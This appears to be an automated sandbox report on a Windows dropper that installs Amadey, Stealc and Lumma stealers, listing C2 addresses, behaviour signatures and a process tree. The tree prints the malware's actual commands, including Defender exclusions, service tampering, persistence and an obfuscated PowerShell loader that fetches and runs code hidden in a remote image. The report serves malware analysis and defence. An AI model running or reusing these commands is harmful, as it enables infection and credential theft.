Resubmissions

07/12/2024, 20:10

241207-yxxwvswphn 10

07/12/2024, 20:09

241207-yxd4ra1mhy 10

07/12/2024, 19:57

241207-yphrzawldn 10

Analysis

  • max time kernel
    1800s
  • max time network
    1805s
  • platform
    windows10-ltsc 2021_x64
  • resource
    win10ltsc2021-20241023-en
  • resource tags

    arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system
  • submitted
    07/12/2024, 20:09

General

  • Target

    8a9978062d7c4c4c7c0ad7060c4806b9778f5a7cadbbe908fd025b2e43acc47e.exe

  • Size

    1.8MB

  • MD5

    c8e524188e050ce815d005118b2cecd8

  • SHA1

    9f03539c6a0bd9228e9ac101f9084c7bff5da130

  • SHA256

    8a9978062d7c4c4c7c0ad7060c4806b9778f5a7cadbbe908fd025b2e43acc47e

  • SHA512

    066da375d6613f6cf0dc66aa0fb4a7af223c696184612293166dda7ea88feb0141f86aba430b7b98f7f8fd164208d794ef6489b0d10e8ba2aac3702a47fc01fb

  • SSDEEP

    49152:Ka5J8sXIqsyUqAFQix4D0hRSD8gLIVkxu6c2Oi6:KOJ8sXMykHWD0hu89VkI6c2f

Malware Config

Extracted

Family

amadey

Version

4.41

Botnet

fed3aa

C2

http://185.215.113.16

Attributes
  • install_dir

    44111dbc49

  • install_file

    axplong.exe

  • strings_key

    8d0ad6945b1a30a186ec2d30be6db0b5

  • url_paths

    /Jo89Ku7d/index.php

rc4.plain

Extracted

Family

stealc

Botnet

default_valenciga

C2

http://185.215.113.17

Attributes
  • url_path

    /2fb6c2cc8dce150a.php

Extracted

Family

lumma

C2

https://impend-differ.biz/api

https://print-vexer.biz/api

https://dare-curbys.biz/api

https://covery-mover.biz/api

https://formy-spill.biz/api

https://dwell-exclaim.biz/api

https://zinc-sneark.biz/api

https://se-blurry.biz/api

https://drive-connect.cyou/api

https://crib-endanger.sbs/api

https://faintbl0w.sbs/api

https://300snails.sbs/api

https://bored-light.sbs/api

https://3xc1aimbl0w.sbs/api

https://pull-trucker.sbs/api

https://fleez-inc.sbs/api

https://thicktoys.sbs/api

https://atten-supporse.biz/api

Extracted

Family

stealc

Botnet

stok

C2

http://185.215.113.206

Attributes
  • url_path

    /c4becf79229cb002.php

Extracted

Family

lumma

C2

https://drive-connect.cyou/api

https://se-blurry.biz/api

https://zinc-sneark.biz/api

https://dare-curbys.biz/api

https://atten-supporse.biz/api

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • UAC bypass 3 TTPs 2 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 38 IoCs
  • Blocklisted process makes network request 11 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Run Powershell and hide display window.

  • Creates new service(s) 2 TTPs
  • Downloads MZ/PE file
  • Stops running service(s) 4 TTPs
  • Checks BIOS information in registry 2 TTPs 64 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 6 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 64 IoCs
  • Identifies Wine through registry keys 2 TTPs 37 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 6 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses Microsoft Outlook profiles 1 TTPs 42 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Power Settings 1 TTPs 8 IoCs

    powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

  • An obfuscated cmd.exe command-line is typically used to evade detection. 2 IoCs
  • Drops file in System32 directory 5 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 38 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Windows directory 3 IoCs
  • Launches sc.exe 14 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 8 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 26 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies data under HKEY_USERS 50 IoCs
  • Runs net.exe
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\8a9978062d7c4c4c7c0ad7060c4806b9778f5a7cadbbe908fd025b2e43acc47e.exe
    "C:\Users\Admin\AppData\Local\Temp\8a9978062d7c4c4c7c0ad7060c4806b9778f5a7cadbbe908fd025b2e43acc47e.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks computer location settings
    • Identifies Wine through registry keys
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:3572
    • C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
      "C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Checks computer location settings
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Adds Run key to start application
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:4676
      • C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe
        "C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Checks processor information in registry
        • Suspicious behavior: EnumeratesProcesses
        PID:3780
      • C:\Users\Admin\AppData\Local\Temp\1001527001\lega.exe
        "C:\Users\Admin\AppData\Local\Temp\1001527001\lega.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2076
        • C:\Users\Admin\AppData\Local\Temp\1001527001\lega.exe
          "C:\Users\Admin\AppData\Local\Temp\1001527001\lega.exe"
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          PID:1980
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 1980 -s 1276
            5⤵
            • Program crash
            PID:2952
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 1980 -s 1296
            5⤵
            • Program crash
            PID:932
      • C:\Users\Admin\AppData\Local\Temp\1002824001\48ed7fa3df.exe
        "C:\Users\Admin\AppData\Local\Temp\1002824001\48ed7fa3df.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:4840
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 4840 -s 1548
          4⤵
          • Program crash
          PID:3280
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 4840 -s 1568
          4⤵
          • Program crash
          PID:3632
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 4840 -s 1568
          4⤵
          • Program crash
          PID:2932
      • C:\Users\Admin\AppData\Local\Temp\1003013001\AllNew.exe
        "C:\Users\Admin\AppData\Local\Temp\1003013001\AllNew.exe"
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Drops file in Windows directory
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:3300
        • C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe
          "C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe"
          4⤵
          • Checks computer location settings
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2616
          • C:\Users\Admin\AppData\Local\Temp\10000331101\Office2024.exe
            "C:\Users\Admin\AppData\Local\Temp\10000331101\Office2024.exe"
            5⤵
            • Executes dropped EXE
            • Drops file in System32 directory
            • Suspicious behavior: EnumeratesProcesses
            PID:4512
            • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
              C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:5288
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
              6⤵
                PID:5964
                • C:\Windows\system32\wusa.exe
                  wusa /uninstall /kb:890830 /quiet /norestart
                  7⤵
                    PID:6984
                • C:\Windows\system32\sc.exe
                  C:\Windows\system32\sc.exe stop UsoSvc
                  6⤵
                  • Launches sc.exe
                  PID:5324
                • C:\Windows\system32\sc.exe
                  C:\Windows\system32\sc.exe stop WaaSMedicSvc
                  6⤵
                  • Launches sc.exe
                  PID:6044
                • C:\Windows\system32\sc.exe
                  C:\Windows\system32\sc.exe stop wuauserv
                  6⤵
                  • Launches sc.exe
                  PID:3116
                • C:\Windows\system32\sc.exe
                  C:\Windows\system32\sc.exe stop bits
                  6⤵
                  • Launches sc.exe
                  PID:5868
                • C:\Windows\system32\sc.exe
                  C:\Windows\system32\sc.exe stop dosvc
                  6⤵
                  • Launches sc.exe
                  PID:5636
                • C:\Windows\system32\powercfg.exe
                  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                  6⤵
                  • Power Settings
                  PID:6212
                • C:\Windows\system32\powercfg.exe
                  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                  6⤵
                  • Power Settings
                  PID:5652
                • C:\Windows\system32\powercfg.exe
                  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                  6⤵
                  • Power Settings
                  PID:840
                • C:\Windows\system32\powercfg.exe
                  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                  6⤵
                  • Power Settings
                  PID:5388
                • C:\Windows\system32\sc.exe
                  C:\Windows\system32\sc.exe delete "QKJNEQWA"
                  6⤵
                  • Launches sc.exe
                  PID:1712
                • C:\Windows\system32\sc.exe
                  C:\Windows\system32\sc.exe create "QKJNEQWA" binpath= "C:\ProgramData\hsbpaqlrqhmp\rzyyvjydedax.exe" start= "auto"
                  6⤵
                  • Launches sc.exe
                  PID:7000
                • C:\Windows\system32\sc.exe
                  C:\Windows\system32\sc.exe stop eventlog
                  6⤵
                  • Launches sc.exe
                  PID:5508
                • C:\Windows\system32\sc.exe
                  C:\Windows\system32\sc.exe start "QKJNEQWA"
                  6⤵
                  • Launches sc.exe
                  PID:5440
              • C:\Users\Admin\AppData\Local\Temp\10000361101\stail.exe
                "C:\Users\Admin\AppData\Local\Temp\10000361101\stail.exe"
                5⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:5104
                • C:\Users\Admin\AppData\Local\Temp\is-D33LL.tmp\stail.tmp
                  "C:\Users\Admin\AppData\Local\Temp\is-D33LL.tmp\stail.tmp" /SL5="$A01CE,3774869,54272,C:\Users\Admin\AppData\Local\Temp\10000361101\stail.exe"
                  6⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of FindShellTrayWindow
                  • Suspicious use of WriteProcessMemory
                  PID:2680
                  • C:\Windows\SysWOW64\net.exe
                    "C:\Windows\system32\net.exe" pause media_record_free_1273
                    7⤵
                    • System Location Discovery: System Language Discovery
                    PID:2932
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 pause media_record_free_1273
                      8⤵
                      • System Location Discovery: System Language Discovery
                      PID:3736
                  • C:\Users\Admin\AppData\Local\Media Record Free 1.2\mediarecordfree3.exe
                    "C:\Users\Admin\AppData\Local\Media Record Free 1.2\mediarecordfree3.exe" -i
                    7⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • System Location Discovery: System Language Discovery
                    PID:3684
          • C:\Users\Admin\AppData\Local\Temp\1004899001\am209.exe
            "C:\Users\Admin\AppData\Local\Temp\1004899001\am209.exe"
            3⤵
            • Checks computer location settings
            • Executes dropped EXE
            • Drops file in Windows directory
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:1176
            • C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe
              "C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe"
              4⤵
              • Checks computer location settings
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:1788
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\10009630142\asyn.ps1"
                5⤵
                • Blocklisted process makes network request
                • Command and Scripting Interpreter: PowerShell
                • Accesses Microsoft Outlook profiles
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                • outlook_office_path
                • outlook_win_path
                PID:3512
                • C:\Windows\SysWOW64\schtasks.exe
                  "C:\Windows\system32\schtasks.exe" /create /tn Admin /SC minute /MO 30 /tr "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoLogo -NoProfile -NonInteractive -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Users\Admin\10009630142\asyn.ps1"" /F
                  6⤵
                  • System Location Discovery: System Language Discovery
                  • Scheduled Task/Job: Scheduled Task
                  PID:932
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" cmd /c powershell -NoProfile -NonInteractive -WindowStyle Hidden -exec bypass "Set-PSReadLineOption -HistorySaveStyle SaveNothing; Function c { & ([ScriptBlock]::Create([System.Text.Encoding]::Default.GetString(@(65,100,100,45,84,121,112,101,32,45,65,115,115,101,109,98,108,121,78,97,109,101,32,83,121,115,116,101,109,46,68,114,97,119,105,110,103,13,10,65,100,100,45,84,121,112,101,32,45,65,115,115,101,109,98,108,121,78,97,109,101,32,83,121,115,116,101,109,46,78,101,116,13,10,13,10,36,119,101,98,32,61,32,78,101,119,45,79,98,106,101,99,116,32,83,121,115,116,101,109,46,78,101,116,46,87,101,98,67,108,105,101,110,116,13,10,36,117,114,108,32,61,32,34,104,116,116,112,115,58,47,47,105,46,105,109,103,104,105,112,112,111,46,99,111,109,47,102,105,108,101,115,47,115,101,116,53,57,49,50,80,121,89,46,66,109,112,34,13,10,36,109,115,32,61,32,78,101,119,45,79,98,106,101,99,116,32,83,121,115,116,101,109,46,73,79,46,77,101,109,111,114,121,83,116,114,101,97,109,13,10,36,119,101,98,46,68,111,119,110,108,111,97,100,68,97,116,97,40,36,117,114,108,41,32,124,32,37,32,123,32,36,109,115,46,87,114,105,116,101,40,36,95,44,32,48,44,32,36,95,46,76,101,110,103,116,104,41,32,125,13,10,36,109,115,46,80,111,115,105,116,105,111,110,32,61,32,48,13,10,36,105,109,103,49,32,61,32,91,83,121,115,116,101,109,46,68,114,97,119,105,110,103,46,73,109,97,103,101,93,58,58,70,114,111,109,83,116,114,101,97,109,40,36,109,115,41,13,10,36,101,110,32,61,32,78,101,119,45,79,98,106,101,99,116,32,39,83,121,115,116,101,109,46,67,111,108,108,101,99,116,105,111,110,115,46,71,101,110,101,114,105,99,46,76,105,115,116,91,66,121,116,101,93,39,13,10,102,111,114,101,97,99,104,40,36,120,32,105,110,32,49,46,46,36,105,109,103,49,46,87,105,100,116,104,41,32,123,13,10,32,32,32,32,36,101,110,46,65,100,100,40,40,36,105,109,103,49,46,71,101,116,80,105,120,101,108,40,36,120,32,45,32,49,44,32,48,41,46,82,41,41,13,10,125,13,10,36,112,108,32,61,32,91,83,121,115,116,101,109,46,84,101,120,116,46,69,110,99,111,100,105,110,103,93,58,58,85,84,70,56,46,71,101,116,83,116,114,105,110,103,40,36,101,110,46,84,111,65,114,114,97,121,40,41,41,13,10,36,115,98,32,61,32,91,83,99,114,105,112,116,66,108,111,99,107,93,58,58,67,114,101,97,116,101,40,36,112,108,41,13,10,105,99,109,32,36,115,98,13,10,13,10,35,82,82,82,82)))); } c #d "
                  6⤵
                  • An obfuscated cmd.exe command-line is typically used to evade detection.
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of WriteProcessMemory
                  PID:2500
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    powershell -NoProfile -NonInteractive -WindowStyle Hidden -exec bypass "Set-PSReadLineOption -HistorySaveStyle SaveNothing; Function c { & ([ScriptBlock]::Create([System.Text.Encoding]::Default.GetString(@(65,100,100,45,84,121,112,101,32,45,65,115,115,101,109,98,108,121,78,97,109,101,32,83,121,115,116,101,109,46,68,114,97,119,105,110,103,13,10,65,100,100,45,84,121,112,101,32,45,65,115,115,101,109,98,108,121,78,97,109,101,32,83,121,115,116,101,109,46,78,101,116,13,10,13,10,36,119,101,98,32,61,32,78,101,119,45,79,98,106,101,99,116,32,83,121,115,116,101,109,46,78,101,116,46,87,101,98,67,108,105,101,110,116,13,10,36,117,114,108,32,61,32,34,104,116,116,112,115,58,47,47,105,46,105,109,103,104,105,112,112,111,46,99,111,109,47,102,105,108,101,115,47,115,101,116,53,57,49,50,80,121,89,46,66,109,112,34,13,10,36,109,115,32,61,32,78,101,119,45,79,98,106,101,99,116,32,83,121,115,116,101,109,46,73,79,46,77,101,109,111,114,121,83,116,114,101,97,109,13,10,36,119,101,98,46,68,111,119,110,108,111,97,100,68,97,116,97,40,36,117,114,108,41,32,124,32,37,32,123,32,36,109,115,46,87,114,105,116,101,40,36,95,44,32,48,44,32,36,95,46,76,101,110,103,116,104,41,32,125,13,10,36,109,115,46,80,111,115,105,116,105,111,110,32,61,32,48,13,10,36,105,109,103,49,32,61,32,91,83,121,115,116,101,109,46,68,114,97,119,105,110,103,46,73,109,97,103,101,93,58,58,70,114,111,109,83,116,114,101,97,109,40,36,109,115,41,13,10,36,101,110,32,61,32,78,101,119,45,79,98,106,101,99,116,32,39,83,121,115,116,101,109,46,67,111,108,108,101,99,116,105,111,110,115,46,71,101,110,101,114,105,99,46,76,105,115,116,91,66,121,116,101,93,39,13,10,102,111,114,101,97,99,104,40,36,120,32,105,110,32,49,46,46,36,105,109,103,49,46,87,105,100,116,104,41,32,123,13,10,32,32,32,32,36,101,110,46,65,100,100,40,40,36,105,109,103,49,46,71,101,116,80,105,120,101,108,40,36,120,32,45,32,49,44,32,48,41,46,82,41,41,13,10,125,13,10,36,112,108,32,61,32,91,83,121,115,116,101,109,46,84,101,120,116,46,69,110,99,111,100,105,110,103,93,58,58,85,84,70,56,46,71,101,116,83,116,114,105,110,103,40,36,101,110,46,84,111,65,114,114,97,121,40,41,41,13,10,36,115,98,32,61,32,91,83,99,114,105,112,116,66,108,111,99,107,93,58,58,67,114,101,97,116,101,40,36,112,108,41,13,10,105,99,109,32,36,115,98,13,10,13,10,35,82,82,82,82)))); } c #d
                    7⤵
                    • UAC bypass
                    • Blocklisted process makes network request
                    • Command and Scripting Interpreter: PowerShell
                    • Drops file in System32 directory
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2840
              • C:\Windows\SysWOW64\rundll32.exe
                "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main
                5⤵
                • Blocklisted process makes network request
                • Loads dropped DLL
                • System Location Discovery: System Language Discovery
                PID:896
              • C:\Windows\SysWOW64\rundll32.exe
                "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main
                5⤵
                • Blocklisted process makes network request
                • Loads dropped DLL
                • System Location Discovery: System Language Discovery
                PID:2932
          • C:\Users\Admin\AppData\Local\Temp\1005242001\v_dolg.exe
            "C:\Users\Admin\AppData\Local\Temp\1005242001\v_dolg.exe"
            3⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Checks whether UAC is enabled
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            PID:1148
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 1148 -s 1344
              4⤵
              • Program crash
              PID:3756
          • C:\Users\Admin\AppData\Local\Temp\1005660001\67a6e9e716.exe
            "C:\Users\Admin\AppData\Local\Temp\1005660001\67a6e9e716.exe"
            3⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            PID:636
          • C:\Users\Admin\AppData\Local\Temp\1005661001\0640d63084.exe
            "C:\Users\Admin\AppData\Local\Temp\1005661001\0640d63084.exe"
            3⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            PID:4756
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 4756 -s 1468
              4⤵
              • Program crash
              PID:216
          • C:\Users\Admin\AppData\Local\Temp\1005662001\3474f7a7ee.exe
            "C:\Users\Admin\AppData\Local\Temp\1005662001\3474f7a7ee.exe"
            3⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            PID:4664
          • C:\Users\Admin\AppData\Local\Temp\1005663001\0cea2256a0.exe
            "C:\Users\Admin\AppData\Local\Temp\1005663001\0cea2256a0.exe"
            3⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            PID:556
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 556 -s 1504
              4⤵
              • Program crash
              PID:6252
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 4840 -ip 4840
        1⤵
          PID:4548
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 4840 -ip 4840
          1⤵
            PID:844
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 1980 -ip 1980
            1⤵
              PID:2148
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 1980 -ip 1980
              1⤵
                PID:4496
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 4840 -ip 4840
                1⤵
                  PID:2084
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 1148 -ip 1148
                  1⤵
                    PID:4652
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 4840 -ip 4840
                    1⤵
                      PID:3084
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 4756 -ip 4756
                      1⤵
                        PID:4260
                      • C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
                        "C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"
                        1⤵
                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                        • Checks BIOS information in registry
                        • Executes dropped EXE
                        • Identifies Wine through registry keys
                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                        • Suspicious behavior: EnumeratesProcesses
                        PID:3408
                      • C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe
                        "C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe"
                        1⤵
                        • Executes dropped EXE
                        PID:3640
                      • C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe
                        "C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe"
                        1⤵
                        • Executes dropped EXE
                        PID:1996
                      • C:\ProgramData\hsbpaqlrqhmp\rzyyvjydedax.exe
                        C:\ProgramData\hsbpaqlrqhmp\rzyyvjydedax.exe
                        1⤵
                        • Executes dropped EXE
                        • Drops file in System32 directory
                        • Suspicious use of SetThreadContext
                        • Suspicious behavior: EnumeratesProcesses
                        PID:6928
                        • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                          C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                          2⤵
                          • Command and Scripting Interpreter: PowerShell
                          • Drops file in System32 directory
                          • Modifies data under HKEY_USERS
                          • Suspicious behavior: EnumeratesProcesses
                          PID:5124
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                          2⤵
                            PID:7064
                            • C:\Windows\system32\wusa.exe
                              wusa /uninstall /kb:890830 /quiet /norestart
                              3⤵
                                PID:6740
                            • C:\Windows\system32\sc.exe
                              C:\Windows\system32\sc.exe stop UsoSvc
                              2⤵
                              • Launches sc.exe
                              PID:3396
                            • C:\Windows\system32\sc.exe
                              C:\Windows\system32\sc.exe stop WaaSMedicSvc
                              2⤵
                              • Launches sc.exe
                              PID:5616
                            • C:\Windows\system32\sc.exe
                              C:\Windows\system32\sc.exe stop wuauserv
                              2⤵
                              • Launches sc.exe
                              PID:236
                            • C:\Windows\system32\sc.exe
                              C:\Windows\system32\sc.exe stop bits
                              2⤵
                              • Launches sc.exe
                              PID:3644
                            • C:\Windows\system32\sc.exe
                              C:\Windows\system32\sc.exe stop dosvc
                              2⤵
                              • Launches sc.exe
                              PID:5676
                            • C:\Windows\system32\powercfg.exe
                              C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                              2⤵
                              • Power Settings
                              PID:764
                            • C:\Windows\system32\powercfg.exe
                              C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                              2⤵
                              • Power Settings
                              PID:3112
                            • C:\Windows\system32\powercfg.exe
                              C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                              2⤵
                              • Power Settings
                              PID:5292
                            • C:\Windows\system32\powercfg.exe
                              C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                              2⤵
                              • Power Settings
                              PID:2548
                            • C:\Windows\system32\conhost.exe
                              C:\Windows\system32\conhost.exe
                              2⤵
                                PID:5548
                              • C:\Windows\system32\cmd.exe
                                cmd.exe
                                2⤵
                                • Blocklisted process makes network request
                                • Modifies data under HKEY_USERS
                                • Suspicious behavior: EnumeratesProcesses
                                PID:5300
                            • C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
                              "C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"
                              1⤵
                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                              • Checks BIOS information in registry
                              • Executes dropped EXE
                              • Identifies Wine through registry keys
                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                              PID:6472
                            • C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe
                              "C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe"
